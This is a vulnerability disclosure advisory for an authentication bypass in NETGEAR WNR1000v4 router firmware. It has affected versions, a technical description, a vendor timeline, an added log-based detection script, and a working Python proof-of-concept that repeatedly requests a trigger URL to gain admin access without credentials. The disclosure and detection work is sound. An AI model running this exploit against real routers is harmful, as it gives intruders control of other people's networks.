
Exploit Netgear Wnr1000v4 Authbypass

Introduction

Multiple NETGEAR wireless routers [1] are vulnerable out of the box to an authentication bypass attack. No router option has to be changed to exploit the issue, so an attacker can access the administration interface of the router without submitting any valid username and password, just by requesting a special URL several times.

Affected

  • Router Firmware N300_1.1.0.31_1.0.1.img
  • Router Firmware N300-1.1.0.28_1.0.1.img
  • Router Firmware N300-1.1.0.24_1.0.1.img

Tested and confirmed on the WNR1000v4 router with the firmware versions listed above. Other products may also be vulnerable because the firmware is used in multiple devices.

Technical Description

The attacker can exploit the issue by using a browser or writing a simple exploit.

  1. When a user wants to access the web interface, an HTTP Basic authentication login is initiated.
  2. If they do not know the username and password, they are redirected to the 401_access_denied.htm file.
  3. An attacker now has to call the URL http://[ROUTER-IP]/BRS_netgear_success.html multiple times.

After that the adversary can access the administration web interface and there is no username/password prompt.
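As an added example that is not part of the original advisory, the following detection logic runs over HTTP access-log lines recorded in front of the router (for example by a reverse proxy or a network sensor) and flags a source that requests the trigger URL repeatedly and then receives a 200 for a page that earlier answered 401. The log lines are constructed, and the Common Log Format, the 60-second window and the three-hit threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines in Common Log Format (not real traffic).
# 10.0.0.5 follows the bypass pattern; 10.0.0.9 hits the trigger URL only once.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Sep/2015:10:00:00 +0000] "GET / HTTP/1.1" 401 0
10.0.0.5 - - [29/Sep/2015:10:00:01 +0000] "GET /BRS_netgear_success.html HTTP/1.1" 200 1420
10.0.0.5 - - [29/Sep/2015:10:00:02 +0000] "GET /BRS_netgear_success.html HTTP/1.1" 200 1420
10.0.0.5 - - [29/Sep/2015:10:00:03 +0000] "GET /BRS_netgear_success.html HTTP/1.1" 200 1420
10.0.0.5 - - [29/Sep/2015:10:00:04 +0000] "GET / HTTP/1.1" 200 3901
10.0.0.9 - - [29/Sep/2015:10:05:00 +0000] "GET / HTTP/1.1" 401 0
10.0.0.9 - - [29/Sep/2015:10:05:01 +0000] "GET /BRS_netgear_success.html HTTP/1.1" 200 1420
10.0.0.9 - - [29/Sep/2015:10:05:30 +0000] "GET / HTTP/1.1" 401 0
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
TRIGGER_PATH = "/BRS_netgear_success.html"   # the URL named in the advisory
WINDOW = timedelta(seconds=60)                # assumed correlation window
MIN_HITS = 3                                  # assumed threshold (PoC uses 3)


def parse_line(line):
    """Parse one Common Log Format line into (ip, timestamp, path, status)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, path, int(status)


def find_bypass_attempts(log_text):
    """Return source IPs that hit TRIGGER_PATH at least MIN_HITS times within
    WINDOW and afterwards got a 200 although they previously received a 401."""
    hits = defaultdict(list)   # ip -> timestamps of trigger-URL requests
    denied = set()             # ips that were challenged with 401 earlier
    flagged = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, when, path, status = rec
        if path == TRIGGER_PATH:
            hits[ip].append(when)
            continue
        if status == 401:
            denied.add(ip)
        elif status == 200 and ip in denied:
            recent = [t for t in hits[ip] if when - t <= WINDOW]
            if len(recent) >= MIN_HITS and ip not in flagged:
                flagged.append(ip)
    return flagged
```

Running find_bypass_attempts(SAMPLE_LOG) reports only 10.0.0.5; a single hit on the trigger URL followed by another 401 is not flagged.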

PoC Python Script

import sys
import time
import urllib.error
import urllib.request

# Same logic as the original Python 2 (urllib2) PoC, ported to Python 3.
# Usage: python3 poc.py <ROUTER-IP>
base = "http://" + sys.argv[1]

try:
    first = urllib.request.urlopen(base)
    print("No password protection!")
except urllib.error.HTTPError:
    # The router answered with 401 (HTTP Basic authentication required).
    print("Password protection detected!")
    print("Executing exploit...")
    # Request the trigger URL several times, one second apart.
    for i in range(0, 3):
        time.sleep(1)
        urllib.request.urlopen(base + "/BRS_netgear_success.html")

    # Raises HTTPError again if the router still requires authentication.
    second = urllib.request.urlopen(base)
    if second.getcode() == 200:
        print("Bypass successful. Now use your browser to have a look at the admin interface.")

Timeline

  • 21.07.2015: Vendor notified by email (security@netgear.com) -> No response
  • 23.07.2015: Vendor notified via official chat support
  • 24.07.2015: Support redirected notification to the technical team
  • 29.07.2015: Requested status update and asked if they need further assistance -> No response
  • 21.08.2015: Notified vendor that we will go full disclosure within 90 days if they do not react
  • 03.09.2015: Support again said that they will redirect it to the technical team
  • 03.09.2015: Netgear sent a beta firmware version to check whether the vulnerability is fixed
  • 03.09.2015: Confirmed to Netgear that the problem is solved in this version -> Asked Netgear when they plan to release the firmware with this security fix
  • 11.09.2015: Response from Netgear saying they will not disclose the patch release day
  • 15.09.2015: Asked Netgear a second time when they plan to publish the security fix -> No response
  • 29.09.2015: Full disclosure of this vulnerability by SHELLSHOCK LABS
  • 06.10.2015: Forced public release of this advisory to follow up on [2]

References

This post is licensed under CC BY 4.0 by the author.